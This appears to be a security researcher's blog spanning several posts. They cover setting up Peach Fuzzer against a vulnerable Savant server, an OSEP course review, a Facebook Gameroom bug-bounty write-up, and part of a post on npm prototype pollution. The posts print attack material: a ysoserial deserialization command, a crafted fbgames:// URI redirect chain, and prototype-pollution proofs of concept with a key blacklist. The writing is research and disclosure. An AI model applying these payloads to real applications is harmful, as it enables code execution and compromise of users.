There are a few more dependencies for Peach to work, but they are not listed in the documentation:

  • .NET Framework 4.5.1

  • WinDBG

  • WireShark

  • Visual C++ Redistributable for Visual Studio 2012 Update 4

.NET Framework 4.5.1 can be installed with Visual Studio as described above. To install WinDBG, follow the instructions at https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools. WireShark has a standard installer which you can use without any issues. This will allow you to use the Windows Debugger and packet monitors.

Since Peach Fuzzer uses !exploitable to triage crashes, you will need to install the specific version Visual C++ Redistributable for Visual Studio 2012 Update 4 from https://www.microsoft.com/en-us/download/details.aspx?id=30679. I tested other versions and it only works with the 2012 version.

Build Commands

Finally, it is time to build! Clone the repository and cd into it and run python waf configure (or py -2.7 waf configure in my case). If all goes well, you should see this:

WAF Configure

WAF Configure

If the build fails, it is time to start debugging. I found the error messages from configure helpful as most of the time, the failure is caused by a missing dependency. You can also use the Visual Studio installer to repair your installation in case binaries were removed.

After configuration, run python waf build. This will build your documentation as well as the Windows x86 and x64 variants in protocol-fuzzer-ce\slag. Finally, run python waf install to create the final binaries and output to protocol-fuzzer-ce\output.

WAF Install

WAF Install

As we did not specify the variant for installation, the installer will generate files for both debug and release for x86 and x64. For most purposes, you will want to use the release version of x64; this will be your Peach directory.

Running Peach Fuzzer

Writing Templates

After building Peach Fuzzer, it is time to put it through its paces. Peach Fuzzer is a generational fuzzer — this means it generates test cases from user-defined templates. This is especially useful for highly structured file types or protocols with strict checksums and formatting.

I will demonstrate Peach Fuzzer's capabilities by running my template against a small test case: a remote buffer overflow via a HTTP request to Savant Web Server 3.1. It is always good to validate your templates against a known vulnerable application. Although the open-source version of Peach Fuzzer does not come with any built-in templates, there are pretty good templates (known as Pits in Peach) available such as this HTTP Pit.

Before writing your templates, I highly recommend reading the “Peach Pro Developer Guide” that is generated in output\doc\sdk\docs as part of the build process. It provides details about the individual components of the templates, as well as the arguments and inputs for the various Peach binaries which I will not be discussing in this article. Now back to testing the template:

I adapted the previous HTTP Pit file into a generic GET HTTP template:

 <?xml version="1.0" encoding="utf-8"?>
    <Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">

        <DataModel name="GetRequest">
            <String value="GET " mutable="false" token="true"/> 
            <String value="/"/>             
            <String value=" HTTP/1.1" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="User-Agent: " mutable="false" token="true"/>
            <String value="Mozilla/5.0"/>   
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Host: ##HOST##:##PORT##" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept: " mutable="false" token="true"/>
            <String value="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"/>   
            <String value="\r\n" mutable="false" token="true"/> 
            
            <String value="Accept-Language: " mutable="false" token="true"/>
            <String value="en-us"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept-Encoding: " mutable="false" token="true"/>
            <String value="gzip, deflate"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Referer: " mutable="false" token="true"/>
            <String value="http://##HOST##/"/>  
            <String value="\r\n" mutable="false" token="true"/>     

            <String value="Cookie: " mutable="false" token="true"/>
            <String value=""/>
                    
            <String value="Conection: " mutable="false" token="true"/>
            <String value="Keep-Alive" mutable="false" token="true"/>   
            <String value="\r\n" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>
        </DataModel>    
        
        <DataModel name="GetResponse">
            <String value="" />
        </DataModel>

        <StateModel name="StateGet" initialState="Initial">
            <State name="Initial">
                <Action type="output">
                    <DataModel ref="GetRequest"/>
                </Action>
                <Action type="input">
                    <DataModel ref="GetResponse"/>
                </Action>
            </State>
        </StateModel>   

        <Agent name="LocalAgent">
            <Monitor class="WindowsDebugger" />
        </Agent>

        <Test name="Default">
            <StateModel ref="StateGet"/>
            <Agent ref="LocalAgent"/>
            <Publisher class="TcpClient">
                <Param name="Host" value="##HOST##"/>
                <Param name="Port" value="##PORT##"/>
            </Publisher>
            
            <Logger class="File">
                <Param name="Path" value="Logs"/>
            </Logger>
            <Strategy class="Sequential" />
        </Test> 
    </Peach>

In order to support the parameters, Peach Pits must also be accompanied by a configuration file:

    <?xml version="1.0" encoding="utf-8"?>
    <PitDefines>
        <All>
            <String key="HOST" value="127.0.0.1" name="Host" description="Server host name or IP"/>
            <String key="PORT" value="21" name="Port" description="Server port number"/>
        </All>
    </PitDefines>

Thereafter, copy the http_get.xml and http_get.xml.config into {PEACH DIRECTORY}\bin\pits\Net\http_get.xml. You can rename the folder from Net to any other category. Note: Your templates MUST be in a subfolder of pits, otherwise it will not turn up in the Peach GUI.

Next, from the Peach directory, run .\Peach.exe. This will start up the web interface on port 8888 and open it up in your browser. Lucky you!

Peach Web Interface

Peach Web Interface

Configuring a Fuzzing Session

We are nearly there! Continue by installing the vulnerable version of Savant from the Exploit Database page.

Next, go to Library where you should see your HTTP Get template listed. Click it to start a new Pit configuration. Since we are fuzzing Savant's Web Server, name the configuration Savant.

In the next screen, select Variables. From here, overwrite the parameters to match the host and port that Savant will occupy.

Configure Variables

Configure Variables

Next, you will need to add Monitors. If you are running Peach directly from the CLI, these would already be defined in your template. However, the web interface appears to require manual configuration. Let us look at the two steps to do so:

Step One: add an agent. This defaults to local, meaning the agent will run in the Peach instance itself rather than in a different host. Name it something reasonable, like LocalAgent.

Step two: add a monitor. Since we want to monitor the Savant process for crashes, we must add a Windows Debugger monitor and set the Executable parameter to the path Savant.exe.

Configure Monitors

Configure Monitors

Peach Fuzzer also comes with lots of useful monitors and automations such as a popup clicker (e.g. closing registration reminders) and network monitoring. For now, the Windows Debugger is all you need.

Save your monitoring configuration, then go to Test to perform a test run. This will run Savant with one test case to ensure everything goes smoothly. If all goes well, it is time to run your fuzzing session!

Successful Test

Successful Test

Running a Fuzzing Session

Go back to the main dashboard to start your session. Cross your fingers! In Savant's case, it will only be a few seconds before you hit your first fault (crash)!

Fuzzing Session

Fuzzing Session

Peach Fuzzer will automatically triage your crashes with the WinDbg's !exploitable in the Risk column (in the screenshot everything is UNKNOWN due to the missing 2012 Redistributable dependency, but it should be properly triaged if it is installed).

You can click on individual test cases to view the proper description and memory of the crash.

Fault Detail

Fault Detail

You can also download the test case that caused the crash. If we inspect the test case for Savant, we will see that Peach Fuzzer modified the GET / path to GET ///////////... The WinDBG output also suggests that EIP has been overwritten. With that, we have proven that the template can successfully discover the known request header buffer overflow vulnerability in Savant by fuzzing it. Now go forth and find another target!

Conclusion

In terms of free and open-source template-based generational fuzzers, researchers do not have many options. The biggest alternative is the Python “Monsters Inc.” line of fuzzers, namely Sulley, later BooFuzz, and now Fuzzowski by NCC Group. GitLab's open-source Peach Fuzzer presents a big step forward in terms of usability and sophistication, albeit limited by the lack of prebuilt templates. If you have templates from a previous purchase of Peach Fuzzer Professional, you are in luck. However, the secret sauce of these fuzzers is always the templates. Sadly, GitLab will not be open-sourcing the Pro templates and will only be offering them behind a commercial product later this year. Without a large library of templates, the usefulness of Peach Fuzzer is limited.

If you are willing to put in the work to build your own templates, I think that Peach Fuzzer is a fantastic starter kit to get you into the fuzzing game. However when it comes to more advanced fuzzing, Peach falls short. While it claims to be a “smart” fuzzer, it was documented in an older era of fuzzing. It is perhaps more accurate to call it a generational or file format-aware fuzzer that fuzzes based on prewritten templates. These days, coverage-guided/feedback-driven fuzzers such as AFL and Honggfuzz may be considered more advanced approaches. Peach only uses Intel Pin to minimise corpora and does not appear to use it for actual fuzzing.

Peach, however, still has its place in any researcher's toolkit, especially if your focus is on specific file structures. I found that Peach is especially useful for prototyping potential fuzzing targets due to the quick setup and ability to fuzz black-box targets without a harness. It can still pick up surface-level vulnerabilities and help highlight potentially vulnerable targets for deeper fuzzing.

#infosec #cybersecurity #fuzzing #hacking

Offensive Security Experienced Penetration Tester (OSEP) Review and Exam

11 March 2021 at 09:40

Good Things Come in Threes

In August last year, Offensive Security announced that it was retiring the long-standing Offensive Security Certified Expert (OSCE) certification and replacing it with three courses, each with their own certification. If you get all three, you are also awarded the new Offensive Security Certified Expert – Three (OSCE3) certification.

OSCE3 by Offensive Security

While this is undoubtedly a great business decision by Offensive Security – the market loves bundles – how useful are these courses for security professionals? The first of the three courses, Advanced Web Attacks and Exploitation (WEB-300)/Offensive Security Web Expert (OSWE), was already released at that time and is a known quantity. In October 2020, Offensive Security released the Evasion Techniques and Breaching Defenses (PEN-300) course that comes with the Offensive Security Experienced Penetration Tester (OSEP) certification and more recently released Windows User Mode Exploit Development (EXP-301)/Offensive Security Exploit Developer (OSED). The three courses target specific domains and therefore are relevant to different roles in offensive security.

As I had already achieved the OSWE in 2019, I took the 60-day OSEP package from January to February 2021. At the time of writing, this costs $1299. PEN-300/OSEP teaches Red Team skills – if your job involves network penetration (such as through phishing emails) and subsequently pivoting through Active Directory environments with the occasional Linux server, this is the course for you. If you are mostly working on application penetration testing (think web and mobile apps), OSWE is a better fit. And if you are doing vulnerability research in binaries, OSED will build that foundation.

Overall, I felt that the OSEP was worth the price of admission given the sheer amount of content it throws at you, as well as the excellent labs that will solidify your learning-by-doing. Here's my review along with some tips and tricks to maximize your OSEP experience.

What You Should Know

Before jumping in, Offensive Security recommends the following:

  • Working familiarity with Kali Linux and Linux command line
  • Solid ability in enumerating targets to identify vulnerabilities
  • Basic scripting abilities in Bash, Python, and PowerShell
  • Identifying and exploiting vulnerabilities like SQL injection, file inclusion, and local privilege escalation
  • Foundational understanding of Active Directory and knowledge of basic AD attacks
  • Familiarity with C# programming is a plus

Given that PEN-300 is an advanced course, I definitely recommend getting the OSCP first if you don't have the fundamental skills OSEP requires. Additionally, even though the course says familiarity with C# programming is a plus, I think it's almost a necessity given how much C# features in the course.

What You Will Learn

When it comes to Offensive Security courses, I've come to expect a main dish of core knowledge along with a grab-bag of funky side dishes. While PEN-300 dives deep into core penetration testing skills such as antivirus evasion and Active Directory enumeration, it also includes a bunch of extras such as kiosk hacking (think airport internet terminals or digital mall directories), DNS exfiltration, and more. You never know when you might need this knowledge, but I felt that this sometimes comes at the cost of depth. In particular, I felt that the Linux sections were noticeably sparser than the Windows ones; looking at bash histories or Vim configurations isn't exactly groundbreaking.

On the other hand, OSEP is extremely good when it goes deep. I started the course with only a passing knowledge of Active Directory and Windows payloads, but came out confident that I could craft a Word macro or C# executable payload that could evade most antivirus engines and subsequently pivot through the network. In particular, OSEP teaches you about the Windows system APIs that many tools use behind the scenes. So rather than using Mimikatz to dump a credential database, you'll be taught how Mimikatz does this and code it yourself.

As such, you'll be spending a lot of time in Visual Studio coding up your payloads from scratch. I found this experience invaluable in pushing my knowledge beyond OSCP-level practitioner skills into a deep understanding of the Windows environment. The exploits and techniques remain relevant to modern contexts; you'll be working on Windows 10 and Windows Server 2019 boxes most of the time, as well as the latest versions of Linux. The boxes also regularly update their antivirus signatures.

I also really liked how each chapter builds on the previous one. Offensive Security continuously throws additional roadblocks at your initial payload, forcing you to rebuild over and over again. Got an in-memory Meterpreter shell working? Try evading this antivirus! Managed to bypass that? How about beating AppLocker? Got your shell and trying to run some enumeration scripts? Sorry buddy, you have to deal with AMSI. At the end of it all, you'll walk away with a battle-hardened payload and the skills to build it.

What You Should Also Learn By Yourself

Although PEN-300 is fairly modern, it still misses out on some of the latest developments. Additionally, it only mentions tools like BloodHound in passing but doesn't teach you how to use it, which seems like a big omission. As such, I think you should bolster your PEN-300 knowledge with these:

  • BloodHound: Pretty much essential. Learn how to collect BloodHound data with SharpHound, analyze it, and discover lateral movement vectors. PenTest Partners has a great walkthrough and includes the screenshot below.
  • CrackMapExec: Get familiar with this tool and integrate it into your workflow; it'll speed up your lateral movement.
  • Better enumeration scripts: Although PEN-300 recommends a few, I found that I got better coverage by running a few different ones; I like JAWS for Windows and linuxprivchecker for Linux.
  • Other Active Directory lateral movements: HackTricks has a good list.

PenTest Partners BloodHound

Additionally, familiarize yourself with the quirks of your tooling. For example, only certain versions of Mimikatz work on Windows 10 but don't work on others; keep multiple versions on hand in case you are dealing with a different environment.

How I Prepared for the Exam

Given that the OSEP was a new course, I erred on the side of over-preparation:

  • Completed every single Extra Mile challenge
  • Completed all 6 course labs (do them in order from 1 to 6 as they increase in difficulty)
  • Completed several HackTheBox Windows boxes (see below)
  • Worked on the HackTheBox Cybernetics Pro Lab

I found that HTB boxes were not as useful as I expected, given that they were limited to one machine as compared to PEN-300's focus on networks. Here are the boxes I attempted in order of usefulness (most useful first):

  • Forest
  • Active
  • Monteverde
  • Cascade
  • Resolute
  • Mantis
  • Fuse
  • Fulcrum

While they were great for practicing various tools like CrackMapExec, some were a bit too CTF-like, especially towards the end of the list. I found the HackTheBox Pro Lab far more useful; Cybernetics consists of about 28 boxes across several networks and applies a lot of the techniques taught in PEN-300. If you have the cash to spare (it's pretty expensive at 90 pounds for a month + initial set up), I'd say go for it, but it's not necessary.

Additionally, I did some payload preparation before the exam. Make sure to collect all the payloads you have written throughout the course and have them ready to deploy. Write down the scripts, commands, and tools you were taught throughout the course and know how to use them. Since PEN-300 provides the compiled binaries of the tools throughout the labs, I recommend saving them all in one place so that you have a canonical version of Mimikatz or Rubeus that you know will work in the exam environment.

You should also prepare a Windows development virtual machine that uses a shared drive from your Kali machine to easily build and test payloads. Even though the labs and exam provide a development machine, it's a little slow over the VPN. Microsoft provides a free Windows development VM that's perfect for the job.

The exam itself is 48 hours (actually 47 hours 45 minutes) and provides several pathways to pass. As per the exam documentation, you can either compromise the final target machine or compromise enough machines to accumulate 100 points.

I took about half a day to pivot through the network and successfully compromise the final machine. Although it was enough to pass, I spent the next one and a half days attempting other machines for practice and writing my report. In general, I think that the course material itself covers what you need for the exam, There's no need to pay for HackTheBox machines – just do your extra miles and complete all the included labs. Overall, the exam is challenging but not impossible, especially with the multiple ways to pass it. Focus on what you've learned, refine your payloads in advance, and you will be able to do it.

After sending in my report on Monday, I received my pass confirmation email on Friday!

Pass Email

Another One Bytes the Dust

With the OSEP down, I'll be taking on EXP-301/OSED to build my vulnerability research skills. Since most cybersecurity professionals these days have to work in interdisciplinary fields rather than in silos, the Offensive Security Certified Expert – Three bundle makes a lot of sense. At the same time, I think the OSEP stands tall on its own as an advanced Red Team penetration testing course. Whether you're looking to take the next step beyond OSCP into Red Teaming or rounding out your offensive security skills, there's something for you.

#infosec #offensivesecurity #cybersecurity

Applying Offensive Reverse Engineering to Facebook Gameroom

2 February 2021 at 17:03

Late last year, I was invited to Facebook's Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook's assets, I knew it was going to be a tough challenge. Their security controls have only gotten tougher over the years – even simple vulnerabilities such as cross-site scripting are hard to come by, which is why they pay out so much for those. As such, top white hat hackers tend to approach Facebook from a third-party software angle, such as Orange Tsai's well-known MobileIron MDM exploits.

Given my limited time (I also started late due to an administrative issue), I decided to stay away from full-scale vulnerability research and focussed on simple audits of Facebook Gaming's access controls. However, both the mobile and web applications were well-secured, as one would expect. After a bit of digging, I came across Facebook Gameroom, a Windows-native client for playing Facebook games. I embarked on an illuminating journey of applying offensive reverse engineering to a native desktop application.

Facebook Gameroom, Who Dis?

If you haven't heard about Facebook Gameroom, you're probably not alone. Released in November 2016, Gameroom was touted as a Steam competitor that supports Unity, Flash, and more recently HTML5 games. However, in recent years Facebook has turned its attention to its mobile and web platforms, especially with the rise of streaming. In fact, Gameroom is scheduled to be decommissioned in June this year. Fortunately for me, it was still alive and kicking at the time of the event.

Facebook Gameroom

The first thing I noticed was that Gameroom did not require any elevated permissions to install. It appeared to be a staged installer, where a minimal installer pulls additional files from the web instead of a monolithic installer. Indeed, I quickly found the installation directory at C:\Users\<USERNAME>\AppData\Local\Facebook\Games, since most user-level applications are placed in the C:\Users\<USERNAME>\AppData folder. The folder contained lots of .dll files as well as several executables. A few things stood out to me:

  1. Gameroom came with its own bundled 7zip executable (7z.exe and 7z.dll), which was possibly outdated and vulnerable.
  2. Gameroom stored user session data in Cookies SQLite database, which presented an attractive target for attackers.
  3. Gameroom included the CefSharp library (CefSharp.dll), which after further research turned out to be an embedded Chromium-based browser for C#.

The third point suggested to me that Gameroom was written in the .NET framework. The .NET framework allows programmes to be compiled into Common Intermediate Language (CIL) code instead of machine code, which can run in a Common Language Runtime application virtual machine. There are several benefits to this, including greater interoperability and portability of .NET applications. However, it is also a lot easier to decompile these applications back into near-source code since they are compiled as CIL rather than pure machine code.

For .NET assemblies, DNSpy is the de-facto standard. Reverse engineers can easily debug and analyze .NET applications with DNSpy, including patching them live. I popped FacebookGameroom.exe into DNSpy and got to work.

A Wild Goose Chase: Searching for Vulnerable Functions

I began by searching for vulnerable or dangerous functions such as unsafe deserializations. If you've done the Offensive Security Advanced Web Attacks and Exploitation course, you would be intimately familiar with deserialization attacks. I won't go into detail about them here, but just know that it involves converting data types into easily-transportable formats and back, which can lead to critical vulnerabilities if handled badly. For example, Microsoft warns against using BinaryFormatter in its code quality analyzer with a pretty stark BinaryFormatter is insecure and can't be made secure.

Unfortunately, BinaryFormatter popped up in my search for the “Deserialize” string.

System.Runtime.Serialization.Formatters.Binary.BinaryFormatter

However, I needed to find the vulnerable code path. I right-clicked the search result, selected “Analyze”, then worked up the “Used By” chain to locate where Gameroom used BinaryFormatter.Deserialize.

Used By Chain

Eventually, this led me to the System.Configuration.ApplicationSettingsBase.GetPreviousVersion(string) and System.Configuration.ApplicationSettingsBase.GetPropertyValue(string) functions. Gameroom used the deserialization function to retrieve its application settings at startup – but from where? Looking back at the installation folder, I found fbgames.settings, which turned out to be a serialized blob. As such, if I injected a malicious deserialization payload into this file, I could obtain code execution. Before that, however, I needed to find a deserialization gadget. With a bit more searching based on a list of known deserialization gadgets, I discovered that Gameroom used the WindowsIdentity class.

With that, I worked out a code execution proof-of-concept:

  1. Using the ysoserial deserialization attack tool, I generated my code execution payload with ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o raw -c "calc" -t > fbgames.settings.
  2. Next, I copied fbgames.settings to C:\Users\<YOUR USERNAME>\AppData\Local\Facebook and replaced the original file. No admin privileges were required since it was located in a user directory.
  3. Finally, I opened Facebook Gameroom and calculator popped!

Although it was exciting to get code execution, upon further discussion with the Facebook team we agreed that this did not fit their threat model. Since Gameroom executes as a user-level applications, there's no opportunity to escalate privileges. Additionally, since overwriting the file required some level of access (e.g. via a malicious Facebook game that would require approval to be listed publicly), there was no viable remote attack vector.

I learned an important lesson in the different threat landscape posed by native applications – search for a viable remote attack vector first before diving into the code-level vulnerabilities.

Scheming My Way to Success

Have you ever clicked on a link from an email and magically started Zoom? What exactly happened behind the scenes? You just used a custom URI scheme, which allows you to open applications like any other link on the web. For example, Zoom registers the zoommtg: URI scheme and parses links like zoommtg:zoom.us/join?confno=123456789&pwd=xxxx&zc=0&browser=chrome&uname=Betty.

Similarly, I noticed that Gameroom used a custom URI scheme to automatically open Gameroom after clicking a link from the web browser. After searching through the code, I realized that Gameroom checked for the fbgames: URI scheme in FacebookGames\Program.cs:

private static void OnInstanceAlreadyRunning()
{
    Uri uri = ArgumentHelper.GetLaunchScheme() ?? new Uri("fbgames://");
    if (SchemeHelper.GetSchemeType(uri) == SchemeHelper.SchemeType.WindowsStartup)
    {
        return;
    }
    NativeHelpers.BroadcastArcadeScheme(uri);
}

If Gameroom had been opened with the fbgames:// URI, it would proceed to parse it in the SchemeHelper class:

public static SchemeHelper.SchemeType GetSchemeType(Uri uri)
{
if (uri == (Uri) null)
return SchemeHelper.SchemeType.None;
string host = uri.Host;
if (host == "gameid")
return SchemeHelper.SchemeType.Game;
if (host == "launch_local")
return SchemeHelper.SchemeType.LaunchLocal;
return host == "windows_startup" ? SchemeHelper.SchemeType.WindowsStartup : SchemeHelper.SchemeType.None;
}

public static string GetGameSchemeId(Uri uri)
{
if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
return (string) null;
string str = uri.AbsolutePath.Substring(1);
int num = str.IndexOf('/');
int length = num == -1 ? str.Length : num;
return str.Substring(0, length);
}

If the URI had the gameid host, it would parse it with SchemeHelper.SchemeType.Game. If it used the launch_local host, it would parse it with SchemeHelper.SchemeType.LaunchLocal. I started with the promising launch_local path, tracing it to FacebookGames.SchemeHelper.GenLocalLaunchFile(Uri):

public static async Task<string> GenLocalLaunchFile(Uri uri)
{
    string result;
    if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.LaunchLocal || uri.LocalPath.Length <= 1)
    {
        result = null;
    }
    else if (!(await new XGameroomCanUserUseLocalLaunchController().GenResponse()).CanUse)
    {
        result = null;
    }
    else
    {
        string text = uri.LocalPath.Substring(1);
        result = ((MessageBox.Show(string.Format("Are you sure you want to run file\n\"{0}\"?", text), "Confirm File Launch", MessageBoxButtons.YesNo) == DialogResult.Yes) ? text : null);
    }
    return result;
}

Unfortunately, it appeared that even though I could launch any arbitrary file in the system through a URI like fbgames://launch_local/C:/evilapp.exe (as documented by Facebook), this would be blocked by a confirmation dialog. I tried to bypass this dialog with format strings and non-standard inputs, but couldn't find a way past it.

I returned to the gameid path, which opened a Facebook URL based on the game ID in the URI. For example, if you wanted to launch Words With Friends in Gameroom, you would visit fbgame://gameid/168378113211268 in a browser and Gameroom would open https://apps.facebook.com/168378113211268 in the native application window.

However, I realized that GetGameSchemeId, which extracted the ID from the URI that would be added to the apps.facebook.com URL, did not actually validate that the slug was a valid ID. As such, an attacker could redirect the native application window to any other page on Facebook.

public static string GetGameSchemeId(Uri uri)
{
if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
return (string) null;
string str = uri.AbsolutePath.Substring(1);
int num = str.IndexOf('/');
int length = num == -1 ? str.Length : num;
return str.Substring(0, length);
}

For example, fbgame://gameid/evilPage would redirect the Gameroom window to https://apps.facebook.com/evilPage.

But how could I redirect to attacker-controlled code in Gameroom? There were a few options, including abusing an open redirect on apps.facebook.com. Unfortunately, I did not have one on hand at that time. Another way was to redirect to a Facebook Page or ad that allowed embedded iframes with custom code.

At this point, I hit a roadblock. Revisting the code of GetGameSchemeId, it took only the first slug in the URI path, so fbgame://gameid/evilPage/app/123456 would direct the native application window to https://apps.facebook.com/evilPage and discard /app/123456.

Fortunately, there were additional code gadgets I could use. The version of Chrome used in Gameroom was really outdated: 63.0.3239.132 – the current version at the time was 86.0.4240.75. As such, it did not support the new version of Facebook Pages. The classic Facebook Pages version accepted a sk parameter such that https://apps.facebook.com/evilPage?sk=app_123456 led to the custom tab with the attacker-controlled code at https://apps.facebook.com/evilPage/app/123456!

But how could I inject the additional query parameter in my custom scheme? Remember that Gameroom discards anything after the first URL slug, including query parameters. Or does it? Looking back at FacebookGames/SchemeHelper.cs, I found GetCanvasParamsFromQuery:

public static IDictionary<string, string> GetCanvasParamsFromQuery(Uri uri)
{
if (uri == (Uri) null)
return (IDictionary<string, string>) null;
string stringToUnescape;
if (!UriHelper.GetUrlParamsFromQuery(uri.ToString()).TryGetValue("canvas_params", out stringToUnescape))
return (IDictionary<string, string>) null;
string str = Uri.UnescapeDataString(stringToUnescape);
try
{
return JsonConvert.DeserializeObject<IDictionary<string, string>>(str);
}
catch
{
return (IDictionary<string, string>) null;
}
}

Before passing on the custom URI, GetCanvasParamsFromQuery would look for the canvas_params query parameter, serialize it as a JSON dictionary, and convert it into the new URL as query parameters.

This led me to my final payload scheme. fbgames://gameid/evilPage?canvas_params={"sk":"app_123456"} would be parsed by Gameroom into https://apps.facebook.com/evilPage/app/123456 in the native application browser window, which would then execute my custom JavaScript code.

As mentioned earlier, the threat landscape for a native application is very different from a web application. By redirecting the embedded Chrome native window to attacker-controlled Javascript, an attacker could proceed to perform known exploits on the 3-year-old embedded Chromium browser. Although a full exploit had not been publicly released, I was able to leverage the CVE-2018-6056 proof-of-concept code to crash the Chrome engine via a type confusion vulnerability.

Alternatively, an attacker could create pop up boxes that were essentially legitimate native MessageBoxes to perform phishing attacks, or attempt to read the cached credentials file. Fortunately, unlike Electron applications that integrate Node.JS APIs, CefSharp limits API access. However, it still remains vulnerable to Chromium and third-party library vulnerabilities.

Summing Up

Facebook awarded it as High and subsequently patched the vulnerability, pushing me into the top-10 leaderboard for Bountycon. Although Gameroom will be shut down soon, it definitely left me with some fond memories (and practice) in basic offensive reverse engineering. For newcomers to application reverse engineering, Electron, CefSharp, and other browser-based frameworks are a good starting place to test for web-adjacent weaknesses like cross-site scripting and open redirects, while exploiting desktop-only code execution vectors.

#reverseengineering #infosec

Supply Chain Pollution: Hunting a 16 Million Download/Week npm Package Vulnerability for a CTF Challenge

23 December 2020 at 15:29

Background

GovTech's Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.

From my experience, a significant number of vulnerabilities arise from developers' lack of familiarity with third-party libraries that they use in their code. If these libraries are compromised by malicious actors or applied in an insecure manner, developers can unknowingly introduce devastating weaknesses in their applications. The SolarWinds supply chain attack is a prime example of this.

As one of the most popular programming languages for web developers, the Node.js ecosystem has had its fair share of issues with third-party libraries. The Node package manager, better known as npm, serves more than one hundred billion packages per month and hosts close to one-and-a-half million packages. Part of what makes package managers so huge is the tree-like dependency structure. Every time you install a package in your project, you also install that package's dependencies, and their dependencies, and so on - sometimes ending up with dozens of packages!

npm's recent statistics.

If a single dependency in this chain is compromised or vulnerable, it can lead to cascading effects on the entire ecosystem. In 2018, a widely-used npm package, event-stream, was taken over by a malicious author who added bitcoin-stealing code targeting the Copay bitcoin wallet. Even though the attacker had a single target in mind, the popular event-stream package was downloaded nearly 8 million times in 2.5 months before the malicious code was discovered. In 2019, I presented a tool called npm-scan at Black Hat Asia that sought to identify malicious packages, but it was clear that npm needed to resolve this systematically. Thankfully, the npm ecosystem has improved significantly since then, including the release of the npm audit feature and more active monitoring.

Hunting NPM Package Vulnerabilities

With this context in mind, I set out to design a challenge that used a vulnerable npm package. Additionally, I wanted to exploit a prototype pollution vulnerability. To put it simply, prototype pollution involves overwriting the properties of Javascript objects in an application by polluting the objects' prototypes. For example, if I overwrote the toString property of an object and printed that object with console.log, it would output my overwritten value instead of the actual string representation of that object. This can lead to critical issues depending on the application - imagine what would happen if I overwrote the isAdmin property of a user object to always be true! Nevertheless, as the impact of prototype pollution remains dependent on the application context, few know how to properly exploit it.

Next, I applied two tactics to find npm packages that were vulnerable to prototype pollution: pattern matching and functionality grouping.

Pattern Matching

When vulnerable code is written, it often falls into recognisable patterns that can be captured by static scanners. This forms the basis of many tools such as GitHub's CodeQL, which scans open source codebases for unsafe code patterns. While scanners are used defensively to discover vulnerabilities ahead of time, attackers can also perform their own pattern matching to discover unreported vulnerabilities in open source code.

My tool of choice was grep.app, a speedy regex search engine that trawls over half a million public repositories on GitHub. Since most npm packages host their code on GitHub, I felt confident that it would uncover at least a few vulnerable packages. The next step was to identify a useful regex pattern. I looked up previously-disclosed prototype pollution vulnerabilities in npm packages and found a January 2020 Snyk advisory for the dot-prop package. Next, I checked the GitHub commit that patched the vulnerability.

dot-prop's code diff.

dot-prop patched the prototype pollution vulnerability by blacklisting the following keys:

const disallowedKeys = [
	'__proto__',
	'prototype',
	'constructor'
];

Here, there was no obvious code pattern that was inherently vulnerable; it was the lack of a blacklist that made it vulnerable. I decided to zoom out a little and focus on what dot-prop did that required a blacklist in the first place. According to the package description, dot-prop is a package to get, set, or delete a property from a nested object using a dot path.

For example, I could set a propety like so:

// Setter
const object = {foo: {bar: 'a'}};
dotProp.set(object, 'foo.bar', 'b');
console.log(object); // {foo: {bar: 'b'}}

However, the following proof-of-concept would trigger a prototype pollution using dot-prop's set function:

const object = {};
console.log("Before " + object.b); // Undefined
dotProp.set(object, '__proto__.b', true);
console.log("After " + {}.b); // true

This worked because the function of dot-prop was to parse a dotted path string as keys in an object and set the values of those keys. Based on what we know about prototype pollution, this is inherently dangerous unless certain keys are blacklisted.

After considering this, I decided to search for patterns that matched other dotted path parsers. dot-prop used path.split('.') to split up dotted paths, although I later discovered that key.split('.') was commonly used by other packages as well. With this approach, I discovered several vulnerable packages, but this required me to manually inspect each package's code to verify if a blacklist was used. Additionally, not all dotted path parsers used key or path to denote the dotted path string, so I probably missed out on many more.

grep.app search with JavaScript filter.

Functionality Grouping

I realised that a better approach would be to group npm packages based on their functionality - in the previous case, dotted path parsers. This is because such functionality is unsafe by default unless appropriate blacklists or safeguards are put in place. After looking through the dotted path parsers, I stumbled on a far more prolific group of packages - configuration file parsers.

Configuration files come in various formats such as YAML, JSON, and more. Out of these, TOML and INI are very similar and match this format:

[foo]
bar = "baz"

A typical INI parser would parse this file into the following object:

iniParser.parse(fs.readFileSync('./config.ini', 'utf-8')) // { foo: { bar: 'baz' } }

However, unless the parser sets up a blacklist, the following config file would lead to prototype pollution:

[__proto__]
polluted = "polluted"

However, unless the parser uses a blacklist, the following configuration file would lead to prototype pollution:

iniParser.parse(fs.readFileSync('./payload.ini', 'utf-8')) // { }
console.log(parsed.__proto__) // { polluted: 'polluted' }
console.log({}.polluted) // polluted
console.log(polluted) // polluted

Indeed, prototype pollution vulnerabilities have been reported in such parsers previously, but only on an ad-hoc basis. I built my proof-of-concept code to quickly test packages at scale, then used npm's search function to discover other parsers. The search function supports searching by tags such as keywords:toml or keywords:toml-parser, allowing me to quickly discover multiple vulnerable packages.

One of these was ini, a simple INI parser with a staggering sixteen million downloads per week:

ini downloads statistics.

